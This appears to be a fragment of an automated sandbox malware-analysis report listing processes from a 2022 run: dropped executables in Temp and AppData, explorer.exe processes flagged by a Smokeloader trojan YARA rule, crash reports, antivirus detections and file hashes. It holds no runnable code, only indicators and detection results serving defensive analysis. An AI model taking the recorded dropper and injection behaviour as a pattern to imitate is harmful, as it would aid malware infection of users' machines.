                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  Imagebase:0x140000000
                                                                                                                                  File size:3633152 bytes
                                                                                                                                  MD5 hash:D30C815C9E13D428430F2A8B4018D3D5
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:14
                                                                                                                                  Start time:22:06:42
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  Imagebase:0x970000
                                                                                                                                  File size:3611360 bytes
                                                                                                                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000000.490370694.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:15
                                                                                                                                  Start time:22:06:45
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\explorer.exe
                                                                                                                                  Imagebase:0x7ff69bc80000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Target ID:16
                                                                                                                                  Start time:22:06:48
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520
                                                                                                                                  Imagebase:0x1380000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Target ID:17
                                                                                                                                  Start time:22:06:49
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 520
                                                                                                                                  Imagebase:0x1380000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Target ID:19
                                                                                                                                  Start time:22:07:16
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\idduhcf
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\idduhcf
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:221696 bytes
                                                                                                                                  MD5 hash:BD0DFD6CBAE2B012D4A5F155D10ED054
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Target ID:20
                                                                                                                                  Start time:22:07:18
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\4316.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\4316.exe
                                                                                                                                  Imagebase:0x1020000
                                                                                                                                  File size:418816 bytes
                                                                                                                                  MD5 hash:2D29421E985E4FB5F6ABB42FA3A502C1
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML

                                                                                                                                  Target ID:21
                                                                                                                                  Start time:22:07:20
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7fcd70000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  No disassembly